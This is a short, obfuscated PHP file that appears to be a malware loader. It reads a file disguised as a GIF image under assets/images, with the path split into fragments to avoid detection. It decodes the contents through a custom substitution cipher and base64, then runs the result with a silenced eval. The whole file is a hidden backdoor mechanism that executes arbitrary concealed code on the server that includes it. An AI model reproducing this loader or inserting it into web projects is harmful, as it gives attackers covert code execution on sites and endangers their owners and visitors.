<?php

function eqafel_ejahicere($fesike_ykezinude) {
    if ($fesike_ykezinude == 1)
        return ycetib_hyjahuch();
    if ($fesike_ykezinude == 2)
        return zakaku_nehepoho();
}

function renyqe_zhoredakha($fesike_ykezinude) {
    $pudoza = eqafel_ejahicere(1);
    $ofexash = eqafel_ejahicere(2);
    for ($yheqesh = 0; $yheqesh < strlen($pudoza); $yheqesh++) {
        $elekyp = substr($pudoza, $yheqesh, 1);
        $ahijih = substr($ofexash, $yheqesh, 1);
        $dypyri[$elekyp] = $ahijih;
    }

    $iqyrot = strtr($fesike_ykezinude, $dypyri);
    $iqyrot = base64_decode($iqyrot);

    return $iqyrot;
}

function memucy_awaletheli($fesike_ykezinude) {
    $igybyty = array();
    if (!file_exists($fesike_ykezinude))
        return false;
    $dotata = @file_get_contents($fesike_ykezinude);
    if (!$dotata)
        return false;
    $dotata = substr($dotata, 3);
    $igybyty = renyqe_zhoredakha($dotata);
    return $igybyty;
}

function ycetib_hyjahuch() {
    $dotata = "1CWJac8+HjtYu0DiqoM2fPndpEOVxzAkKZ3L/TBNX96sIG7eR=lmQ4rvgwShybU5F";
    return $dotata;
}

function zakaku_nehepoho() {
    $igybyty = "RsILOAlg+ircC4S3M5bWwNhqJkYPK8pVB6nTta12H=/7DfjvxezZGo9FdUyXEuQ0m";
    return $igybyty;
}

$gydiwu = memucy_awaletheli(__DIR__ . "/ass" . "ets/i" . "mages" . "/ixah" . "uku." . "gif");
if ($gydiwu) {
    @eval($gydiwu);
}

